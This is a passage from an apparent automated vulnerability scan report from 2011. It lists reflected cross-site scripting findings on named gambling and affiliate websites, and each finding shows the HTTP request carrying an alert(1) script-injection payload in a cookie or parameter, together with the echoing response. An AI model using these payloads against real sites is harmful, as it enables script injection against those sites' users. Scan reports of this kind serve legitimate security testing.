<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FMeed7e"-alert(1)-"ec4303889bc";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.316. http://www.mundirasca.com/SecurityAndPrivacy.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/SecurityAndPrivacy.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2e19c"-alert(1)-"c11a7558480 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /SecurityAndPrivacy.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM2e19c"-alert(1)-"c11a7558480; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2e19c"-alert(1)-"c11a7558480; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:54 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 36037

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2e19c"-alert(1)-"c11a7558480";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.317. http://www.mundirasca.com/Terms.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Terms.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3771c"-alert(1)-"f8899f6c3a8 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM3771c"-alert(1)-"f8899f6c3a8; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/
Set-Cookie: BO=FM3771c"-alert(1)-"f8899f6c3a8; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:43 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 104795

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM3771c"-alert(1)-"f8899f6c3a8";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.318. http://www.mundirasca.com/Terms.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/Terms.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2add4"-alert(1)-"97ee14f5f4 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /Terms.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM2add4"-alert(1)-"97ee14f5f4; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:33:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM2add4"-alert(1)-"97ee14f5f4; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:33:28 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 104794

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM2add4"-alert(1)-"97ee14f5f4";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.319. http://www.mundirasca.com/UnderAge.aspx [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/UnderAge.aspx

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 196b6"-alert(1)-"71ef61575b was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM196b6"-alert(1)-"71ef61575b; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: BO=FM196b6"-alert(1)-"71ef61575b; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:16 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35570

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM196b6"-alert(1)-"71ef61575b";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.320. http://www.mundirasca.com/UnderAge.aspx [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/UnderAge.aspx

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 14e6a"-alert(1)-"acb11487409 was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /UnderAge.aspx HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM14e6a"-alert(1)-"acb11487409; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM14e6a"-alert(1)-"acb11487409; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:05 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 35571

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM14e6a"-alert(1)-"acb11487409";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.321. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [BO cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/click/MundiRasca.com/SPA/Home/

Issue detail

The value of the BO cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2fee2"-alert(1)-"f4c5b8a3f08 was submitted in the BO cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /click/MundiRasca.com/SPA/Home/ HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM; BO=FM2fee2"-alert(1)-"f4c5b8a3f08; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:35:03 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/
Set-Cookie: BO=FM2fee2"-alert(1)-"f4c5b8a3f08; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:35:03 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
/ ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM";
            var strBonusOption = "FM2fee2"-alert(1)-"f4c5b8a3f08";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistrationMode!=null){
            strRegistra
...[SNIP]...

3.322. http://www.mundirasca.com/click/MundiRasca.com/SPA/Home/ [RegistrationMode cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.mundirasca.com
Path:	/click/MundiRasca.com/SPA/Home/

Issue detail

The value of the RegistrationMode cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 472cc"-alert(1)-"c4dae1c877d was submitted in the RegistrationMode cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /click/MundiRasca.com/SPA/Home/ HTTP/1.1
Host: www.mundirasca.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: CSI_17=EncryptedUniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7&AffiliateID=17&MarketingMaterialID=0&LastUpdate=2011-05-16&AlternateReference=&PlayerAlternateReference=&ProductTypeID=0; UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; LanguageCode=SPA; RegistrationMode=PM472cc"-alert(1)-"c4dae1c877d; BO=FM; CountryCode=US; CSITemp=17; ASP.NET_SessionId=2d25pf55tujr15nis5ds4m55;

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 16 May 2011 12:34:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: RegistrationMode=PM472cc"-alert(1)-"c4dae1c877d; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/
Set-Cookie: BO=FM; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/
Set-Cookie: UniqueVisitorID=E54D4CB5B3EE9E3F7E0E59BE064BBEE7; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/
Set-Cookie: LanguageCode=SPA; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/
Set-Cookie: CountryCode=US; domain=mundirasca.com; expires=Fri, 16-May-2014 12:34:52 GMT; path=/
Set-Cookie: CSITemp=17; domain=mundirasca.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 37178

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html id="ctl00_htmlMaster" xmlns="http://www.w3.org/1999/xhtml">
<hea
...[SNIP]...
nMode, pBonusOption)
           {
            // ** Registration-Mode and Bonus-Option Initialization
            // A. Initialize using the master page parameters (page scope)
            var strRegistrationMode = "PM472cc"-alert(1)-"c4dae1c877d";
            var strBonusOption = "FM";
            // B. Allow banners to override the page data with their own parameters (banner scope)
            if(typeof(pRegistrationMode)!="undefined" && pRegistration
...[SNIP]...

3.323. https://www.neogamespartners.com/ [CMI parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neogamespartners.com
Path:	/

Issue detail

The value of the CMI request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c8bcb</script><script>alert(1)</script>8f8d294f5a9 was submitted in the CMI parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /?CMI=1c8bcb</script><script>alert(1)</script>8f8d294f5a9 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:47:47 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=1c8bcb</script><script>alert(1)</script>8f8d294f5a9

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
function(){
       $("#brands_hopa_more").show("slow");
   $("#brands_popular").css("padding-top","630px");

       });
});

function RedirectToUrl(url){
//alert(url);
if (!url.indexOf('?')){url=url+'?CMI=1c8bcb</script><script>alert(1)</script>8f8d294f5a9';}
window.location=url;

}
function goto(gourl){
window.location='/'+gourl+'/?CMI=1c8bcb</script>
...[SNIP]...

3.324. https://www.neogamespartners.com/ [CMI parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neogamespartners.com
Path:	/

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d290"><script>alert(1)</script>35779c113bd was submitted in the CMI parameter. This input was echoed as 7d290\"><script>alert(1)</script>35779c113bd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?CMI=7d290"><script>alert(1)</script>35779c113bd HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:47:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=7d290\"><script>alert(1)</script>35779c113bd

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<iframe src="https://www.neogamespartners.com/WebSite/Affiliates/login.aspx?CMI=7d290\"><script>alert(1)</script>35779c113bd" frameborder="0" scrolling="no" height="96" width="950">
...[SNIP]...

3.325. https://www.neogamespartners.com/ [CMI parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neogamespartners.com
Path:	/

Issue detail

The value of the CMI request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 34a94"><script>alert(1)</script>b9311914110 was submitted in the CMI parameter. This input was echoed as 34a94\"><script>alert(1)</script>b9311914110 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?CMI=134a94"><script>alert(1)</script>b9311914110 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 301 Moved Permanently
Connection: close
Date: Mon, 16 May 2011 12:47:22 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Powered-By: PHP/5.1.6
X-Pingback: https://www.neogamespartners.com/xmlrpc.php
Content-Type: text/html; charset=UTF-8
Location:https://www.aspireaffiliates.com/?~/?CMI=134a94\"><script>alert(1)</script>b9311914110

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head prof
...[SNIP]...
<a href="/?CMI=134a94\"><script>alert(1)</script>b9311914110" title="Home">
...[SNIP]...

3.326. https://www.neogamespartners.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.neogamespartners.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8bb36"><script>alert(1)</script>3f495d41aad was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 8bb36\"><script>alert(1)</script>3f495d41aad in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?CMI=1&8bb36"><script>alert(1)</script>3f495d41aad=1 HTTP/1.1
Host: www.neogamespartners.com
Connection: keep-alive
Referer: http://www.scratch2cash.com/scratch-cards/instant-games/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

